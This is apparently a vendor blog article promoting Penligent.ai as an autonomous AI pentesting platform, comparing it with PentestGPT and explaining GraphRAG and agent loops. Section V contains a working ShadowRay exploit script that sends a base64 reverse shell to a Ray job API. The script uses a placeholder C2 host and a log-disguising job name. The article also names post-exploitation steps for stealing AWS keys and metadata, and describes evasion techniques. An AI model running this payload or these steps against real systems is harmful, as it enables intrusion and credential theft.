In the rapidly evolving timeline of offensive AI, the early 2020s are already viewed as the “Static Era.” Tools like the original PentestGPT and various GPT-4 wrappers fundamentally changed the industry by proving that Large Language Models (LLMs) could understand vulnerability logic. However, for the hardcore security engineer in 2026, these tools suffer from a fatal friction point: Passivity.

The “Chatbot” model requires a human operator to act as the data bus—copying Nmap outputs, pasting them into a prompt, waiting for a response, and manually executing the suggested Python script. This Human-in-the-Loop (HITL) bottleneck prevents scale. It relegates the AI to the role of a passive encyclopedia rather than an active teammate.

As we analyze the landscape of PentestGPT Alternatives, we are not looking for a better conversationalist. We are looking for Agency. The market has shifted toward Autonomous AI Agents capable of maintaining long-term state, executing complex kill chains, and reasoning under uncertainty without constant human hand-holding.

I. The Great Decoupling: Why “Copilots” Are Not Enough

To select the right alternative, one must first understand the architectural limitations of legacy LLM-based tools. The primary failure mode of a standard “Copilot” in a real-world engagement is the Context Amnesia Problem.

The Limitations of Linear Context Windows

Standard LLMs operate on a linear context window (e.g., 128k or 1M tokens). While this sounds large, it is unstructured. If you feed a chatbot the scan results of a /16 network (65,536 IPs), the model treats the data as a flat wall of text. It cannot efficiently query the relationships between assets.

- The Symptom: You ask the bot, “Based on the open ports found three hours ago on subnet B, can we pivot to the Domain Controller?”

- The Failure: The bot has likely “forgotten” the specific banner strings from Subnet B, or it hallucinates a connection that doesn’t exist because the data was truncated.
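The toy sketch below makes this failure mode concrete. It is a simplification that assumes the chat client drops the oldest messages once a budget is exceeded and approximates tokens with whitespace-separated words. Real clients and tokenizers behave differently, and the hosts and banners are invented for illustration.

```python
from collections import deque

def fit_to_window(messages, max_tokens):
    """Keep the newest messages whose combined word count fits max_tokens.

    Words stand in for tokens here; this is an approximation, not a real tokenizer.
    """
    kept = deque()
    used = 0
    for msg in reversed(messages):
        cost = len(msg.split())
        if used + cost > max_tokens:
            break  # everything older than this message is silently dropped
        kept.appendleft(msg)
        used += cost
    return list(kept)

# Hypothetical scan log: one early Subnet B finding, then a flood of Subnet C results.
history = ["subnet B 10.1.2.7 port 445 banner Samba 4.15.2"]
history += [f"subnet C 10.1.3.{i} port 80 banner nginx" for i in range(50)]
history.append("Can we pivot from subnet B to the Domain Controller?")

window = fit_to_window(history, max_tokens=200)
print(any("subnet B 10.1.2.7" in m for m in window))
```

The question survives, but the Subnet B banner it depends on has fallen out of the window. That gap is where the model starts guessing.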

The Rise of Large Action Models (LAMs)



The defining characteristic of a true PentestGPT Alternative in 2026 is the transition from LLMs (Language) to LAMs (Action).

- LLM (PentestGPT): Outputs text: “You should run `sqlmap -u target.com`.”

- LAM (Autonomous Agent): Outputs a function call, such as `subprocess.run(["sqlmap", "-u", target_url, "--risk=3"])`, and parses the structured output directly into its internal memory.
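A minimal sketch of the “function call” side: the model emits JSON rather than prose, and the agent maps that JSON to an argument vector through an allowlist. The JSON shape, the `TOOLS` table, and `to_argv` are hypothetical and are not the interface of any particular product. The sqlmap and nmap flags used (`-u`, `--risk`, `--batch`, `-sV`) are real options of those tools.

```python
import json
import shlex

# Hypothetical allowlist: tool name -> builder that turns validated args into argv.
TOOLS = {
    "sqlmap": lambda a: ["sqlmap", "-u", a["url"], f"--risk={int(a['risk'])}", "--batch"],
    "nmap": lambda a: ["nmap", "-sV", a["target"]],
}

def to_argv(model_output: str) -> list[str]:
    """Parse a JSON tool call emitted by the model into an argv list."""
    call = json.loads(model_output)
    name = call["tool"]
    if name not in TOOLS:
        raise ValueError(f"tool {name!r} is not allowlisted")
    return TOOLS[name](call["args"])

argv = to_argv('{"tool": "sqlmap", "args": {"url": "http://target.example/?id=1", "risk": 3}}')
print(shlex.join(argv))
# An agent would then execute subprocess.run(argv, capture_output=True, text=True)
# and store the parsed result in its memory; execution is omitted here.
```

Building an argv list, rather than a shell string, avoids shell-injection issues when model output is passed to a subprocess.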

II. The Technical Landscape: Classifying PentestGPT Alternatives

The market has split into three distinct categories. Understanding this taxonomy is crucial for engineering teams deciding whether to build or buy.

1. The “Wrapper” Class (Legacy)

- Examples: Original PentestGPT, BurpGPT, ChatGPT Custom GPTs.

- Architecture: Stateless API calls to OpenAI/Anthropic.

- Best For: CTF (Capture The Flag) challenges, learning, and syntax help.

- Engineering Verdict: Insufficient for enterprise red teaming due to lack of memory and execution capability.

2. The Open-Source “ReAct” Agents

- Examples: AutoGPT forks, LangChain-based custom scripts.

- Architecture: Uses the “Reason-Act” (ReAct) loop where the model “thinks” about a step, executes it via a local Docker container, and observes the output.

- Pros: Highly customizable; free.

- Cons: Fragility. Open-source agents often get stuck in “logic loops” (e.g., retrying the same failed Nmap command indefinitely). They lack the proprietary “Guardrails” required to prevent crashing production servers.
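The ReAct cycle, together with the kind of repetition guard that the “logic loop” complaint calls for, can be sketched in a few lines. The `think`, `act`, and `goal_reached` callables are hypothetical stand-ins for the model, the sandboxed executor, and the success check. The thresholds are arbitrary. This does not reproduce how AutoGPT or LangChain implement their loops.

```python
from collections import Counter

def react_loop(think, act, goal_reached, max_steps=20, max_repeats=3):
    """Reason -> Act -> Observe, aborting if one action is proposed too often.

    think(history) -> action; act(action) -> observation;
    goal_reached(observation) -> bool. All three are supplied by the caller.
    """
    history = []
    attempts = Counter()
    for _ in range(max_steps):
        action = think(history)                 # Reason
        attempts[action] += 1
        if attempts[action] > max_repeats:      # guard against logic loops
            return f"aborted: repeated action {action!r}", history
        observation = act(action)               # Act
        history.append((action, observation))  # Observe
        if goal_reached(observation):
            return "done", history
    return "aborted: step budget exhausted", history

# Stub "model" that keeps proposing the same failing scan.
status, trace = react_loop(
    think=lambda h: "nmap -p 445 10.0.0.5",
    act=lambda a: "filtered",
    goal_reached=lambda obs: obs == "open",
)
print(status, len(trace))
```

Without the `attempts` counter, this stub would spend the whole step budget repeating one command.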

3. The Enterprise Autonomous Platforms (Sovereign AI)

- Examples: Penligent.ai, XBOW, specialized stealth startups.

- Architecture: Hybrid systems combining LLMs with Symbolic AI (for logic verification) and Graph Databases.

- Key Differentiator: These platforms solve the “State Problem” using GraphRAG.

- Engineering Verdict: The only viable option for continuous, automated production security testing.

III. Comparative Feature Matrix: 2026 Standards

| Feature Metric | PentestGPT (Legacy) | Open Source Agents | Penligent.ai (Autonomous) |
|---|---|---|---|
| Cognitive Architecture | Linear Chat Chain | ReAct Loop | OODA Loop + GraphRAG |
| State Persistence | Session-only (Ephemeral) | File-based (JSON) | Persistent Knowledge Graph |
| Vulnerability Discovery | Generalized (OWASP Top 10) | Random/Unfocused | Business Logic & Chain Oriented |
| Execution Environment | None (User executes) | Local Docker | Cloud/On-Prem Orchestration |
| Stealth / Evasion | N/A | Low (Noisy) | High (Jitter, Protocol Mimicry) |
| False Positive Rate | High (Hallucination) | Medium | Low (Proof-of-Concept Verification) |

IV. The Core Innovation: GraphRAG and “Stateful” Hacking

Why are Penligent.ai and similar advanced platforms considered the superior PentestGPT Alternative? The answer lies in how they store data.

Hacking is fundamentally a graph problem.

- User A has Credentials B.

- Credentials B grant access to Server C.

- Server C has a network route to Database D.

A linear chatbot cannot easily traverse this path. Advanced agents utilize Graph Retrieval-Augmented Generation (GraphRAG).
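The chain above can be modeled as a small directed graph, where the pivot question becomes a breadth-first search for the fewest-hop path. The relationship names are hypothetical, and an in-memory dict stands in for a graph database.

```python
from collections import deque

# Toy attack graph from the example above: node -> [(neighbor, relationship)].
GRAPH = {
    "User A": [("Credentials B", "HAS_CREDENTIAL")],
    "Credentials B": [("Server C", "GRANTS_ACCESS")],
    "Server C": [("Database D", "ROUTES_TO")],
    "Database D": [],
}

def shortest_path(graph, start, goal):
    """Breadth-first search returning the fewest-hop path as (src, rel, dst) edges."""
    queue = deque([start])
    parent = {start: None}
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for nxt, rel in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:
        return None  # goal unreachable from start
    edges = []
    node = goal
    while parent[node] is not None:
        prev, rel = parent[node]
        edges.append((prev, rel, node))
        node = prev
    return list(reversed(edges))

for src, rel, dst in shortest_path(GRAPH, "User A", "Database D"):
    print(f"{src} -[{rel}]-> {dst}")
```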

How It Works in Production

- Ingestion: The agent scans the network. Instead of storing text, it creates Nodes and Edges in a graph database (e.g., Neo4j or Memgraph).

```cypher
CREATE (n:Asset {ip: "10.0.0.5", os: "Linux"})
CREATE (v:Vuln {cve: "CVE-2026-XXXX", type: "RCE"})
CREATE (n)-[:VULNERABLE_TO]->(v)
```

- Reasoning: When the agent needs to pivot, it runs a graph query (e.g., Cypher) to find the “Shortest Path to Domain Admin.”

- Context Injection: The agent retrieves only the relevant path data and feeds it into the LLM context, ensuring the model focuses on the specific attack chain without noise.
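The ingestion and context-injection steps can be sketched without a database. This toy version uses in-memory edge tuples in place of Neo4j/Memgraph and assumes a graph query has already returned the path of interest. It shows why the prompt stays small: only edges lying on that path are serialized. The record fields, relation names, and prompt wording are all hypothetical.

```python
# Hypothetical flat scan rows (fields are illustrative, not a real scanner's schema).
SCAN = [
    {"ip": "10.0.0.5", "port": 8265, "service": "http", "cve": "CVE-2026-XXXX"},
    {"ip": "10.0.0.5", "port": 22, "service": "ssh", "cve": None},
    {"ip": "10.0.0.9", "port": 445, "service": "smb", "cve": None},
]

def ingest(rows):
    """Ingestion: convert rows into (subject, relation, object) edges instead of raw text."""
    edges = []
    for row in rows:
        asset = f"Asset {row['ip']}"
        service = f"Service {row['ip']}:{row['port']}/{row['service']}"
        edges.append((asset, "EXPOSES", service))
        if row["cve"]:
            edges.append((service, "VULNERABLE_TO", f"Vuln {row['cve']}"))
    return edges

def inject(edges, path_nodes, question):
    """Context injection: serialize only edges whose endpoints both lie on the path."""
    facts = [
        f"{s} -[{r}]-> {o}"
        for s, r, o in edges
        if s in path_nodes and o in path_nodes
    ]
    return "Known facts:\n" + "\n".join(facts) + f"\n\nQuestion: {question}"

edges = ingest(SCAN)
# Assume the Reasoning step's graph query returned this path.
path_nodes = {"Asset 10.0.0.5", "Service 10.0.0.5:8265/http", "Vuln CVE-2026-XXXX"}
prompt = inject(edges, path_nodes, "What is the next step on this chain?")
print(prompt)
```

The SSH service and the unrelated 10.0.0.9 host remain in the graph but never reach the model's context.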

V. Real-World Kill Chain: Exploiting AI Infrastructure (CVE-2023-48022)

To demonstrate the “Agentic Difference,” let us analyze a specific attack vector targeting AI infrastructure: ShadowRay (CVE-2023-48022). This vulnerability in the Ray AI framework allowed unauthenticated remote code execution.

Scenario: A Red Team engagement against a fintech company using distributed AI training clusters.

Phase 1: Autonomous Reconnaissance (The Scout)

A standard scanner might identify Port 8265 as “HTTP.”

The Autonomous Agent goes deeper. It fingerprints the HTML response, identifies the “Ray Dashboard” title, and checks the version hash.

- Agent Logic: “Target is running Ray 2.6.0. No Auth headers detected. High probability of CVE-2023-48022.”
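The title-matching part of this fingerprinting step reduces to a simple heuristic. The sketch below works equally well for building an asset inventory. It assumes, as the scenario states, that the page title contains “Ray Dashboard”, and it treats the absence of a `WWW-Authenticate` header as the “no auth” signal. That second check is an illustrative assumption, and the version-hash comparison is not reproduced. The function name is hypothetical.

```python
import re

def looks_like_exposed_ray_dashboard(html: str, headers: dict) -> bool:
    """Heuristic: title mentions 'Ray Dashboard' and no auth challenge header is present."""
    match = re.search(r"<title>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    title = match.group(1).strip() if match else ""
    # Header names are case-insensitive in HTTP, so compare lowercased keys.
    auth_challenge = any(k.lower() == "www-authenticate" for k in headers)
    return "ray dashboard" in title.lower() and not auth_challenge

sample_html = "<html><head><title>Ray Dashboard</title></head><body></body></html>"
print(looks_like_exposed_ray_dashboard(sample_html, {"Content-Type": "text/html"}))
```

A positive result only flags the host for follow-up. It does not confirm a vulnerable version.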

Phase 2: Strategic Weaponization (The Planner)

The agent does not blindly fire a Metasploit module. It reasons about the environment.

- Constraint: “Target is likely inside a Kubernetes container. A standard reverse shell might be blocked by egress filtering.”

- Decision: “I will use a Python reverse shell wrapped in a ‘Job Submission’ API call, tunneling traffic over port 443 to mimic HTTPS.”

Phase 3: Execution and Verification (The Actor)

The agent constructs the payload programmatically.

```python
# Generated by Penligent.ai Autonomous Engine
# Vector: Ray 'Job Submission' API RCE (ShadowRay Logic)
import requests

target_ip = "10.20.1.55"
target_port = "8265"
c2_server = "attacker-infrastructure.io"

# Payload: Base64-encoded Python reverse shell to evade simple string matching
# Decodes to: import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((…))
b64_payload = "aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoJzE5Mi4xNjguMS4xMDAnLDQ0MykpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pTs=="

api_endpoint = f"http://{target_ip}:{target_port}/api/job_agent/submit"
headers = {"Content-Type": "application/json"}

# The agent constructs a legitimate-looking job request
data = {
    "entrypoint": f"echo {b64_payload} | base64 -d | python3",
    "runtime_env": {
        "pip": ["requests"],  # Installing dependencies if needed
    },
    "job_id": "system_maintenance_task_01",  # Social engineering the logs
    "metadata": {"user": "admin"},
}

print(f"[*] Sending Autonomous Payload to {api_endpoint}...")
response = requests.post(api_endpoint, headers=headers, json=data, timeout=10)

if response.status_code == 200:
    print("[+] Job accepted. Check C2 listener.")
    # Agent automatically logs this success to the GraphDB
else:
    print(f"[-] Failed with {response.status_code}. Agent initiating retry with obfuscation.")
```

Phase 4: Post-Exploitation

Upon success, the agent does not stop. It automatically:

- Queries Environment Variables: Looking for `AWS_ACCESS_KEY_ID`.

- Checks Metadata: Queries `http://169.254.169.254/latest/meta-data/`.

- Reports: Generates a PDF report with the exact curl command to reproduce the finding, classifying it as “Critical.”

VI. The Hardcore Requirement: Stealth and Adversarial Evasion

A major critique of early automated tools was their “loudness.” They generated noise that lit up SOC dashboards immediately.

Professional PentestGPT Alternatives such as Penligent.ai implement Adversarial Tradecraft:

- Adaptive Rate Limiting (Jitter): The agent introduces randomized delays (Gaussian distribution) between requests. It never sends precisely 100 packets per second. It sends 12, then waits 4 seconds, then sends 30. This breaks “Beaconing” detection logic.

- User-Agent Rotation & JA3 Spoofing: The agent mimics the TLS fingerprint (JA3) of legitimate browsers (Chrome 120 on Windows, Safari on macOS) to bypass WAFs that block Python-requests or cURL.

- Living Off The Land (LotL): When executing commands on a compromised host, the agent prefers native binaries (`certutil`, `bitsadmin`, `bash`) rather than uploading new malware binaries, significantly reducing the surface area for EDR detection.

VII. The Future: Multi-Agent Swarms

The cutting edge of 2026 is Multi-Agent Orchestration. We are moving away from a single “AI Hacker” to a “Squad” structure.

- Agent Alpha (The Scout): Highly risk-averse. Scans for subdomains and open ports. Never executes exploits.

- Agent Beta (The Specialist): Specialized models (fine-tuned on CVE data). One agent might be an expert in Java Deserialization, another in SQL Injection.

- Agent Gamma (The Commander): The central LLM that receives data from the Scout, assigns tasks to the Specialists, and aggregates the results.

This swarm architecture allows for parallel processing. While Agent Alpha is scanning Subnet C, Agent Beta is simultaneously brute-forcing a login on Subnet A.
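The Commander/Scout/Specialist split maps naturally onto concurrent tasks. The following is a minimal `asyncio` sketch of that orchestration pattern only. The agents are stubs that sleep instead of working, and the discovery data, the routing table, and all names are hypothetical. Scouts run in parallel across subnets. The commander routes each discovered service to a matching specialist, and the specialists also run in parallel.

```python
import asyncio

# Hypothetical scout output per subnet; a real scout would discover this.
FAKE_DISCOVERY = {
    "Subnet A": ["http"],
    "Subnet C": ["java-rmi", "ssh"],
}
# Commander's routing table: service -> specialist skill (hypothetical).
ROUTING = {"http": "sql-injection", "java-rmi": "java-deserialization"}

async def scout(subnet):
    await asyncio.sleep(0.01)  # stands in for discovery; never exploits
    return subnet, FAKE_DISCOVERY.get(subnet, [])

async def specialist(skill, subnet, service):
    await asyncio.sleep(0.01)  # stands in for a specialised check
    return {"skill": skill, "subnet": subnet, "service": service, "status": "checked"}

async def commander(subnets):
    # 1. Scouts run concurrently across subnets.
    discoveries = await asyncio.gather(*(scout(s) for s in subnets))
    # 2. Route each discovered service to a matching specialist; skip unmapped ones.
    jobs = [
        specialist(ROUTING[svc], subnet, svc)
        for subnet, services in discoveries
        for svc in services
        if svc in ROUTING
    ]
    # 3. Specialists run concurrently; gather aggregates results in submission order.
    return await asyncio.gather(*jobs)

results = asyncio.run(commander(["Subnet A", "Subnet C"]))
for r in results:
    print(r)
```

`asyncio` suits this I/O-bound coordination. CPU-heavy specialist models would more likely run as separate processes or services.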

VIII. Penligent.ai: Bridging the Gap



In our analysis of the market, Penligent.ai stands out as a primary example of this “Sovereign Agent” architecture. It was designed specifically to address the failures of stateless chatbots.

By integrating a proprietary Cyber Range for reinforcement learning, Penligent’s agents are trained in safe, simulated environments before being deployed on production networks. This “Gymnasium” approach reduces the risk of accidental denial-of-service, a common fear when letting AI loose on infrastructure. Furthermore, Penligent’s focus on Evidence-Based Reporting ensures that every finding is backed by a verifiable Proof of Concept (PoC), solving the “Hallucination” problem that plagued early GPT tools.

Conclusion

The era of the “AI Copilot” is a transitional phase that is rapidly closing. For the security engineer, the shift to PentestGPT Alternatives that offer true autonomy is not just a productivity hack—it is a survival strategy in an age where adversaries are already automating their attacks.

When evaluating your next tool, ignore the chatbot features. Look for the ASR (Autonomous Strategic Reasoning) capabilities, the robustness of the Graph Memory, and the ability to execute End-to-End Kill Chains. The future belongs to those who can orchestrate agents, not just chat with them.

References

- NIST NVD: CVE-2023-48022 Detail (ShadowRay)

- MITRE ATT&CK: Technique T1595 – Active Scanning

- Penligent Blog: PentestGPT Alternatives and the Rise of Autonomous AI Red Teaming (2026)

- Google Project Zero: Trends in 0-day Exploitation